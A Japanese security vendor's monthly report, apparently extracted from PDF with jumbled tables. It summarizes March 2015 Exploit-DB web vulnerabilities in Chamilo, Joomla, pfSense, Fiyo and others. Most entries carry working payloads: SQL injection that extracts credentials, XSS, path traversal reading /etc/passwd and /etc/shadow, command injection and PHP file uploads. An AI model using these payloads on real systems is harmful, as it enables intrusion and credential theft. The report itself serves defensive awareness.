2015.03 EDB-Report 最新Web脆弱性トレンドレポート(2015.03) 2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2015年3月は、Exploit-DBの分析結果をみると、クロス・サイト・スクリプティング(Cross Site Scripting:XSS、以下XSS)の攻撃による脆弱性が最も多く報告されました。分析されたXSS攻撃は、難易度は易し いレベルである反面、致命的な2次被害を引き起こす可能性があります。さらに、それらのXSS攻撃は、今月に最も多く報告されたOpen Source基盤のChamilo LMSにて発生可能なXSS攻撃であることに特に注 目する必要があります。したがって、当該ソフトウェアをご利用の管理者は、セキュリティパッチやセキュアコーディングなどを行い、XSS攻撃にさらされないように特別な注意を払わなければなりません。また、今月には、シス テムのパスワードを狙うコマンド・インジェクション(Command Injection)の攻撃も報告されています。ハッカーがシステム上の重要ファイルを取得できた場合には、より簡単にシステムを奪取される恐れがあります。当該 脆弱性にさらされないように高いレベルのセキュリティを維持することを勧奨します。 1. 脆弱性別件数 脆弱性カテゴリ クロス サイト スクリプティング (Cross Site Scripting:XSS) SQL インジェクション (SQL Injection) ローカルファイル挿入 (Local File Inclusion:LFI) コマンドインジェクション (Command Injection) ファイルアップロード (File Upload) 脆弱性別件数 21 件数 21 25 20 16 15 16 10 5 5 3 3 2 0 2 合計 47 危険度 件数 割合 早急対応要 16 34% 高 31 66% 中 0 0% 合計 47 100% 危険度別分類 2. 危険度別件数 0 16 早急対応要 高 中 31 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 5 11% 中 5 11% 易 合計 37 79% 47 100% 攻撃実行の難易度別件数 5 5 難 中 易 37 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 5 主なソフトウェア別脆弱性発生件数 件数 Chamilo Joomla pfSense Fiyo WordPress GeniXCMS Moodle PHPMoAdmin Wordpress Bedita CMS ProjectSend Bester Elastix Codoforum Codiad WoltLab Triton and Websense appliance modules V-Series Citrix NetScaler EMC M&R (Watch4Net) Berta 9 6 6 5 3 3 2 1 1 1 1 1 1 1 1 1 1 1 1 1 合計 47 10 9 Chamilo 9 8 7 6 Joomla 6 6 pfSense 5 5 4 3 2 Fiyo 3 3 WordPress 2 1 1 1 1 1 1 1 1 1 1 1 1 1 GeniXCMS 1 0 Copyright 2015 Penta Security Systems Inc. All rights reserved Moodle PHPMoAdmin Wordpress Bedita CMS ProjectSend Bester EDB-Report 最新Web脆弱性トレンドレポート(2015.03) 2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 危険度分類基準 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 中:情報漏洩 攻撃実行難易度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 ソフトウェア名 36435 36435 36435 36435 36435 36435 36435 36435 36435 XSS XSS XSS XSS XSS XSS XSS XSS XSS 易 易 易 易 易 易 易 易 易 高 高 高 高 高 高 高 高 高 Chamilo Chamilo Chamilo Chamilo Chamilo Chamilo Chamilo Chamilo Chamilo 36385 SQL Injection 易 高 36435 SQL Injection 難 早急対応要 Chamilo LMS 1.9.10 - agenda_list.php XSS 脆弱性 Chamilo LMS 1.9.10 - outbox.php XSS 脆弱性 Chamilo LMS 1.9.10 - student.php XSS 脆弱性 Chamilo LMS 1.9.10 - ajax_get_file_listing.php XSS 脆弱性 Chamilo LMS 1.9.10 - configure_extensions.php XSS 脆弱性 Chamilo LMS 1.9.10 - course_category.php XSS 脆弱性 Chamilo LMS 1.9.10 - session_edit.php XSS 脆弱性 Chamilo LMS 1.9.10 - system_status.php XSS 脆弱性 Chamilo LMS 1.9.10 - session_add.php XSS 脆弱性 Joomla Simple Photo Gallery v1.0 - index.php SQL Injection 脆弱 性 Joomla ECommerce-WD Plugin 1.2.5 - index.php SQL Injection 脆 弱性 36464 SQL Injection 難 早急対応要 Joomla Spider FAQ Component - index.php SQL Injection 脆弱性 Joomla 36560 SQL Injection 中 早急対応要 Joomla 36561 SQL Injection 易 高 36563 36506 36506 36506 36506 36506 36506 36581 36581 36581 36581 36581 SQL Injection XSS XSS XSS XSS XSS LFI SQL Injection SQL Injection SQL Injection LFI XSS 中 易 易 易 易 易 易 中 難 易 易 易 高 高 高 高 高 高 早急対応要 早急対応要 早急対応要 高 早急対応要 高 Joomla Gallery WD Component - index.php SQL Injection 脆弱性 Joomla Contact Form Maker 1.0.1 Component - index.php SQL Injection 脆弱性 Joomla Gallery WD - index.php SQL Injection 脆弱性 pfSense 2.2 - status_captiveportal.php XSS 脆弱性 pfSense 2.2 - firewall_rules.php XSS 脆弱性 pfSense 2.2 - firewall_shaper.php XSS 脆弱性 pfSense 2.2 - services_unbound_acls.php XSS 脆弱性 pfSense 2.2 - diag_logs_filter.php XSS 脆弱性 pfSense 2.2 - system_firmware_restorefullbackup.php LFI 脆弱性 Fiyo CMS 2.0.1.8 - /fiyo/dapur/index.php SQL Injection 脆弱性 Fiyo CMS 2.0.1.8 - article_list.php SQL Injection 脆弱性 Fiyo CMS 2.0.1.8 - check_user.php SQL Injection 脆弱性 Fiyo CMS 2.0.1.8 - browse.php LFI 脆弱性 Fiyo CMS 2.0.1.8 - /fiyo/ XSS 脆弱性 Copyright 2015 Penta Security Systems Inc. All rights reserved Joomla Joomla Joomla Joomla pfSense pfSense pfSense pfSense pfSense pfSense Fiyo Fiyo Fiyo Fiyo Fiyo EDB-Report 最新Web脆弱性トレンドレポート(2015.03) 2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2015-03-02 EDB番号 36251 脆弱性カテゴリ Command Injection 攻撃難易度 易 危険度 高 脆弱性名 PHPMoAdmin - moadmin.php Command Injection 脆弱性 攻撃コード 対象プログラム 対象環境 PHPMoAdmin PHPMoAdmin /wp-admin/optionsgeneral.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText WordPress Calculated Fields Form Wordpress Plugin 1.0.10 /wp-content/themes/photocrati-Path-theme/ecommsizes.php?prod_id=2 or 1=1 Wordpress Wordpress Theme Photocrati 4.x.x POST /moadmin/moadmin.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0. 9,*/*;q=0.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded object=1;system('id;ls -lha');exit 2015-03-02 36230 SQL Injection 易 Calculated Fields Form Wordpress Plugin 1.0.10 早急対応要 options-general.php SQL Injection 脆弱性 2015-03-03 36242 SQL Injection 易 早急対応要 2015-03-04 36265 XSS 易 高 Wordpress Theme Photocrati 4.x.x Bedita CMS - saveMailGroups XSS 脆弱性 POST /bedita3.5.0.corylus.2261e29/bedita/index.php/newsletter/sa veMailGroups HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Bedita CMS Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Bedita CMS 3.5.0 data[MailGroup][id]=&data[MailGroup][group_name] =<script>alert(0)</script> 2015-03-06 36303 SQL Injection 易 2015-03-06 36306 SQL Injection 中 2015-03-07 36305 SQL Injection 中 2015-03-08 36374 File Upload 易 早急対応要 ProjectSend r561 - useredit.php SQL Injection 脆弱性 Bester v1.0.4 早急対応要 showprofile.php SQL Injection 脆弱性 Elastix v2.x 早急対応要 iridium_threed.php SQL Injection 脆弱性 早急対応要 File Upload ProjectSend ProjectSend r561 /showprofile.php?id=1' and 1=2 union select 1,concat(0x3a3a,0x557365723d,user(),0x202c204442 5f4e616d653d,database(),0x3a3a),3,4,5,6,7-- Bester Bester v1.0.4 /a2billing/customer/iridium_threed.php?transactionID =-1 and 1=benchmark(2000000,md5(1)) Elastix Elastix v2.x Wordpress Wordpress Plugin Reflex Gallery 3.1.3 GeniXCMS GeniXCMS v0.0.1 GeniXCMS GeniXCMS v0.0.1 /projectsend/users-edit.php?id=2 or 1=1 POST /wordpress/wp-content/plugins/reflexgallery/admin/scripts/FileUploader/php.php?Year=201 5&Month=03 HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="Filedata"; filename="php.php" Content-Type: application/octet-stream <? phpinfo(); ?> -----------------------------7dd10029908f2-/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j POST /genixcms/gxadmin/login.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 2015-03-10 36321 SQL Injection 難 早急対応要 GeniXCMS v0.0.1 - index.php SQL Injection 脆弱性 2015-03-10 36321 SQL Injection 難 早急対応要 GeniXCMS v0.0.1 - login.php SQL Injection 脆弱性 2015-03-10 36321 XSS 易 高 GeniXCMS v0.0.1 - index.php XSS 脆弱性 /index.php?page=1<script>confirm("ZSL")</script>' GeniXCMS GeniXCMS v0.0.1 2015-03-10 36320 LFI 易 高 Codoforum v2.5.1 - index.php /index.php?u=serve/attachment&path=../../../../../sit LFI 脆弱性 es/default/config.php Codoforum Codoforum v2.5.1 2015-03-12 36371 LFI 易 高 Codiad v2.5.3 - LFI 脆弱性 Codiad Codiad v2.5.3 password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login= /i/197156553/components/filemanager/download.php ?path=../../../../../../../../../../../etc/passwd&type=un defined Copyright 2015 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2015.03) 2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2015-03-13 EDB番号 36368 脆弱性カテゴリ XSS 攻撃難易度 易 危険度 脆弱性名 攻撃コード POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad 7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 対象プログラム 対象環境 WoltLab WoltLab Community Gallery v2.0 高 WoltLab Community Gallery v2.0 - index.php - XSS 脆弱性 WordPress WordPress WPML v3.1.9 Joomla Joomla Simple Photo Gallery v1.0 Moodle Moodle v2.5.9/v2.6.8/v 2.7.5/v2.8.3 Moodle Moodle v2.5.9/v2.6.8/v 2.7.5/v2.8.3 [title]=<script>alert('XSS')</script> 2015-03-16 36414 XSS 易 高 WordPress WPML v3.1.9 - XSS /?icl_action=reminder_popup&target=javascript:alert( 脆弱性 /XSS/);// 2015-03-16 36385 SQL Injection 易 高 Joomla Simple Photo Gallery /index.php?option=com_simplephotogallery&view=im v1.0 - index.php SQL Injection ages&albumid=2 or 1=1 脆弱性 2015-03-17 2015-03-17 36418 36418 XSS XSS 易 易 高 POST /my/index.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Moodle Chrome/16.0.912.75 Safari/535.7 v2.5.9/v2.6.8/v2.7.5/v2.8.3 Accept: */* index.php 脆弱性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 config_title=" onmouseover=prompt("XSS") > POST /blog/index.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 高 Moodle v2.5.9/v2.6.8/v2.7.5/v2.8.3 /appmng/servlet/CommandLineServlet?type=exec&uu id=asdfasdf&module=na1&command=ping&Destinatio n=127.0.0.1'|cat%20/etc/shadow' Triton and Websense appliance modules VSeries Triton v7.8.3 and Websense appliance modules VSeries v7.7 title=ZSL"><script>alert("XSS");</script> 易 高 Triton v7.8.3 and Websense appliance modules V-Series v7.7 - Command Injection 脆 弱性 2015-03-18 36423 Command Injection 2015-03-19 36435 XSS 易 高 Chamilo LMS 1.9.10 agenda_list.php XSS 脆弱性 /main/calendar/agenda_list.php?type=personal%27% 20onmouseover=%27confirm%280%29%27/%3E%3 C!-- Chamilo Chamilo LMS 1.9.10 2015-03-19 36435 XSS 易 高 Chamilo LMS 1.9.10 outbox.php XSS 脆弱性 /main/messages/outbox.php?f=social"+onmouseover ="confirm(0) Chamilo Chamilo LMS 1.9.10 2015-03-19 36435 XSS 易 高 Chamilo LMS 1.9.10 student.php XSS 脆弱性 /main/mySpace/student.php?keyword=31337"+onmo useover=confirm(0)//&active=0&_qf__search_user=& submit=Search Chamilo Chamilo LMS 1.9.10 Chamilo LMS 1.9.10 ajax_get_file_listing.php XSS 脆弱性 /main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ ajax_get_file_listing.php?editor=stand_alone&view=th umbnail&search=1&search_name=admin&search_rec ursively=0&search_mtime_from=&search_mtime_to= &search_folder=;</script><script>confirm(0)</script > Chamilo Chamilo LMS 1.9.10 /main/admin/configure_extensions.php?display=</scr ipt><script>confirm(0)</script> Chamilo Chamilo LMS 1.9.10 /main/admin/course_category.php?action=add&categ ory="/><script>confirm(0)</script> Chamilo Chamilo LMS 1.9.10 /main/admin/session_edit.php?page=resume_session. php%22%20onmouseover=confirm%280%29 Chamilo Chamilo LMS 1.9.10 Chamilo Chamilo LMS 1.9.10 Chamilo Chamilo LMS 1.9.10 2015-03-19 36435 XSS 易 高 2015-03-19 36435 XSS 易 高 2015-03-19 36435 XSS 易 高 2015-03-19 36435 XSS 易 高 2015-03-19 36435 XSS 易 高 2015-03-19 36435 XSS 易 高 Chamilo LMS 1.9.10 configure_extensions.php XSS 脆弱性 Chamilo LMS 1.9.10 course_category.php XSS 脆弱 性 Chamilo LMS 1.9.10 session_edit.php XSS 脆弱性 GET /main/admin/system_status.php?section=webserver Chamilo LMS 1.9.10 HTTP/1.1 system_status.php XSS 脆弱性 Host: User-Agent: <script>confirm(0)</script> POST /main/admin/session_add.php HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Chamilo LMS 1.9.10 Content-Type:application/x-www-form-urlencoded session_add.php XSS 脆弱性 formSent=1&name=<script>confirm(0)</script>&coa ch_username=rehan&session_category=0&nb_days_a cess_before=0&nb_days_acess_after=0&start_limit=o n&day_start=2&month_start=3&year_start=2015&en d_limit=on&day_end=2&month_end=3&year_end=20 16&session_visibility=2 Copyright 2015 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2015.03) 2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 Joomla Joomla ECommerce-WD Plugin 1.2.5 Citrix NetScaler Citrix NetScaler SDX svm-10.550-1.9 EMC M&R (Watch4Net) EMC M&R (Watch4Net) prior v6.5u1 Joomla Joomla Spider FAQ Component POST /index.php?option=com_ecommercewd&controller=pr oducts&task=displayproducts HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type:application/x-www-form-urlencoded 2015-03-19 2015-03-19 36435 36442 SQL Injection Command Injection 難 易 Joomla ECommerce-WD 早急対応要 Plugin 1.2.5 - index.php SQL Injection 脆弱性 高 Citrix NetScaler SDX svm10.5-50-1.9 - Command Injection 脆弱性 product_id=&product_count=&product_parameters_js on=&search_name=&search_category_id=1) AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0) *2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8257=8257&filter_filters_opened=1&filter_manufactu rer_ids=1&filter_price_from=&filter_price_to=&filter_ date_added_range=0&filter_minimum_rating=0&filter _tags=&arrangement=thumbs&sort_by=&sort_order= asc&pagination_limit_start=0&pagination_limit=12 POST /nitro/v1/config/xen_hotfix HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 object={"params"%3a{"action"%3a"start"}%2c"xen_ hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]} 2015-03-19 36440 LFI 易 高 EMC M&R (Watch4Net) prior v6.5u1 /devicediscovery/devicesource/downloadSeedFile?fileFileNam e=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows \System32\drivers\etc\hosts /index.php?option=com_gallery_wd&view=gallerybox &image_id=19&gallery_id=2&theme_id=1%20AND% Joomla Spider FAQ 20(SELECT%206173%20FROM(SELECT%20COUNT(*) 早急対応要 Component - index.php SQL ,CONCAT(0x716b627871,(MID((IFNULL(CAST(databa Injection 脆弱性 se()%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,F LOOR(RAND(0)*2))x%20FROM%20INFORMATION_SC HEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) 2015-03-22 36464 SQL Injection 難 2015-03-26 36506 XSS 易 高 pfSense 2.2 status_captiveportal.php XSS 脆弱性 /status_captiveportal.php?zone=%27%22%3E%3Cscr ipt%3Ealert%28%27ImmuniWeb%27%29;%3C/script %3E pfSense pfSense 2.2 2015-03-26 36506 XSS 易 高 pfSense 2.2 firewall_rules.php XSS 脆弱性 /firewall_rules.php?undodrag=1&dragtable=&if=%27 %22%3E%3Cscript%3Ealert%28%27ImmuniWeb%2 7%29;%3C/script%3E pfSense pfSense 2.2 2015-03-26 36506 XSS 易 高 /firewall_shaper.php?interface=wan&action=add&que pfSense 2.2 ue=%27%22%3E%3Cscript%3Ealert%28%27Immuni firewall_shaper.php XSS 脆弱性 Web%27%29;%3C/script%3E pfSense pfSense 2.2 2015-03-26 36506 XSS 易 高 pfSense pfSense 2.2 2015-03-26 36506 XSS 易 高 pfSense pfSense 2.2 2015-03-26 36506 LFI 易 pfSense pfSense 2.2 2015-03-27 36520 File Upload 易 Berta Berta CMS pfSense 2.2 services_unbound_acls.php XSS 脆弱性 pfSense 2.2 diag_logs_filter.php XSS 脆弱 性 /services_unbound_acls.php?act=edit&id=%27%22% 3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29; %3C/script%3E /diag_logs_filter.php?filterlogentries_submit=1&filterlo gentries_time=%27%22%3E%3Cscript%3Ealert%28 %27ImmuniWeb%27%29;%3C/script%3E pfSense 2.2 /system_firmware_restorefullbackup.php?deletefile=.. 早急対応要 system_firmware_restorefullb /etc/passwd ackup.php LFI 脆弱性 POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Berta CMS upload.php File Content-Type: multipart/form-data; boundary=------早急対応要 Upload 脆弱性 --------------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="Filedata"; filename="c.php" Content-Type: application/octet-stream <? phpinfo(); ?> -----------------------------7dd10029908f2-- Copyright 2015 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2015.03) 2015.03.01~2015.03.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 2015-03-30 36560 SQL Injection 中 2015-03-30 36561 SQL Injection 易 2015-03-30 36563 SQL Injection 中 2015-03-31 36581 SQL Injection 中 2015-03-31 36581 SQL Injection 難 2015-03-31 36581 SQL Injection 易 危険度 脆弱性名 Joomla Gallery WD 早急対応要 Component - index.php SQL Injection 脆弱性 攻撃コード 対象プログラム 対象環境 /index.php?option=com_gallery_wd&view=gallerybox &image_id=19&gallery_id=2&theme_id=1%20AND% 20(SELECT%206173%20FROM(SELECT%20COUNT(*) ,CONCAT(0x716b627871,(MID((IFNULL(CAST(databa se()%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,F LOOR(RAND(0)*2))x%20FROM%20INFORMATION_SC HEMA.CHARACTER_SETS%20GROUP%20B/Y%20x)a) Joomla Joomla Gallery WD Component /index.php?option=com_contactformmaker&view=con tactformmaker&id=1%20and%201=1 Joomla Joomla Contact Form Maker 1.0.1 Component Joomla Joomla Contact Form Maker 1.0.1 Component Fiyo Fiyo CMS 2.0.1.8 Fiyo Fiyo CMS 2.0.1.8 Fiyo Fiyo CMS 2.0.1.8 Fiyo Fiyo CMS 2.0.1.8 Fiyo Fiyo CMS 2.0.1.8 高 Joomla Contact Form Maker 1.0.1 Component - index.php SQL Injection 脆弱性 高 /index.php?option=com_gallery_wd&view=gallerybox &image_id=19&gallery_id=2&theme_id=1%20AND% 20(SELECT%206173%20FROM(SELECT%20COUNT(*) Joomla Gallery WD ,CONCAT(0x716b627871,(MID((IFNULL(CAST(databa index.php SQL Injection 脆弱性 se()%20AS%20CHAR),0x20)),1,50)),0x716a6a7171,F LOOR(RAND(0)*2))x%20FROM%20INFORMATION_SC HEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) Fiyo CMS 2.0.1.8 早急対応要 /fiyo/dapur/index.php SQL Injection 脆弱性 /fiyo/dapur/index.php?app=user&act=edit&id=1%20U NION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x 7171676471,0x66457070464452786c58,0x716a7674 71),NULL,NULL,NULL,NULL,NULL,NULL,NULL# /fiyo/dapur/apps/app_article/controller/article_list.php ?cat=%27%20AND%20(SELECT%204352%20FROM( SELECT%20COUNT(*),CONCAT(0x71666f7671,(SELE CT%20(CASE%20WHEN%20(4352=4352)%20THEN %201%20ELSE%200%20END)),0x7164687671,FLOO R(RAND(0)*2))x%20FROM%20INFORMATION_SCHE Fiyo CMS 2.0.1.8 MA.CHARACTER_SETS%20GROUP%20BY%20x)a)%2 早急対応要 article_list.php SQL Injection 0AND%20%27yeEe%27=%27yeEe&user=%27%20U 脆弱性 NION%20ALL%20SELECT%20NULL,CONCAT(0x71666 f7671,0x4652577247546e6b5241,0x7164687671),NU LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 Host: Connection: Close Fiyo CMS 2.0.1.8 Accept: text/html, application/xhtml+xml, */* 高 check_user.php SQL Injection Accept-Language: ko-KR 脆弱性 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type:application/x-www-form-urlencoded 2015-03-31 36581 LFI 易 早急対応要 2015-03-31 36581 XSS 易 高 Fiyo CMS 2.0.1.8 browse.php LFI 脆弱性 Fiyo CMS 2.0.1.8 - /fiyo/ XSS 脆弱性 act=email&[email protected]' AND SLEEP(5) AND 'UjqT'='UjqT POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng =en&act=download HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type:application/x-www-form-urlencoded dir=files&file=../../../../../../../etc/passwd /fiyo/?app=article&view=item31ab2"><script>alert(1 )</script>0ccba&id=186 Copyright 2015 Penta Security Systems Inc. All rights reserved
© Copyright 2024 ExpyDoc